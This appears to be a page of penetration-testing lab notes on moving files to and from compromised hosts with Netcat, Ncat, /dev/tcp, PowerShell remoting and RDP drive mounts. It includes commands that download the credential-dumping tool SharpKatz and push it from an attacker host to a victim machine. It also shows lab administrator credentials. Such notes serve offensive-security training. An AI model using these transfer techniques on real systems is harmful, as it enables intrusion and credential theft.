Misc File Transfers

File Transfer with Netcat and Ncat

Victim will listen

NetCat - Compromised Machine - Listening on Port 8000

victim@target:~$ # Example using Original Netcat
victim@target:~$ nc -l -p 8000 > SharpKatz.exe

Ncat - Compromised Machine - Listening on Port 8000

victim@target:~$ # Example using Ncat
victim@target:~$ ncat -l -p 8000 --recv-only > SharpKatz.exe

Netcat - Attack Host - Sending File to Compromised machine

$ wget -q https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.7_x64/SharpKatz.exe
$ # Example using Original Netcat
$ nc -q 0 192.168.49.128 8000 < SharpKatz.exe

Ncat - Attack Host - Sending File to Compromised machine

$ wget -q https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.7_x64/SharpKatz.exe
$ # Example using Ncat
$ ncat --send-only 192.168.49.128 8000 < SharpKatz.exe

Attacker will listen

Attack Host - Sending File as Input to Netcat

rednorth@htb[/htb]$ # Example using Original Netcat
$ sudo nc -l -p 443 -q 0 < SharpKatz.exe

Compromised Machine Connect to Netcat to Receive the File

victim@target:~$ # Example using Original Netcat
victim@target:~$ nc 192.168.49.128 443 > SharpKatz.exe

Attack Host - Sending File as Input to Ncat

rednorth@htb[/htb]$ # Example using Ncat
$ sudo ncat -l -p 443 --send-only < SharpKatz.exe

Compromised Machine Connect to Ncat to Receive the File

victim@target:~$ # Example using Ncat
victim@target:~$ ncat 192.168.49.128 443 --recv-only > SharpKatz.exe

Compromised Machine Connect to /dev/tcp to Receive the file

victim@target:~$ cat < /dev/tcp/192.168.49.128/443 > SharpKatz.exe

File Transfer with PowerShell Remoting (WinRM)

From DC01 - Confirm WinRM port TCP 5985 is Open on DATABASE01.

PS C:\htb> whoami

htb\administrator

PS C:\htb> hostname

DC01
PS C:\htb> Test-NetConnection -ComputerName DATABASE01 -Port 5985

ComputerName     : DATABASE01
RemoteAddress    : 192.168.1.101
RemotePort       : 5985
InterfaceAlias   : Ethernet0
SourceAddress    : 192.168.1.100
TcpTestSucceeded : True

Create a PowerShell Remoting Session to DATABASE01

PS C:\htb> $Session = New-PSSession -ComputerName DATABASE01

Copy samplefile.txt from our Localhost to the DATABASE01 Session

PS C:\htb> Copy-Item -Path C:\samplefile.txt -ToSession $Session -Destination C:\Users\Administrator\Desktop\

Copy DATABASE.txt from DATABASE01 Session to our Localhost

PS C:\htb> Copy-Item -Path "C:\Users\Administrator\Desktop\DATABASE.txt" -Destination C:\ -FromSession $Session

File Transfer with RDP

Mounting a Linux Folder Using rdesktop

$ rdesktop 10.10.10.132 -d HTB -u administrator -p 'Password0@' -r disk:linux='/home/user/rdesktop/files'

Mounting a Linux Folder Using xfreerdp

$ xfreerdp /v:10.10.10.132 /d:HTB /u:administrator /p:'Password0@' /drive:linux,/home/plaintext/htb/academy/filetransfer

Then connect to

  • File Manager \\tsclient\

  • mstsc.exe

PreviousUsing Programming LanguagesNextNGINX Put Method

Last updated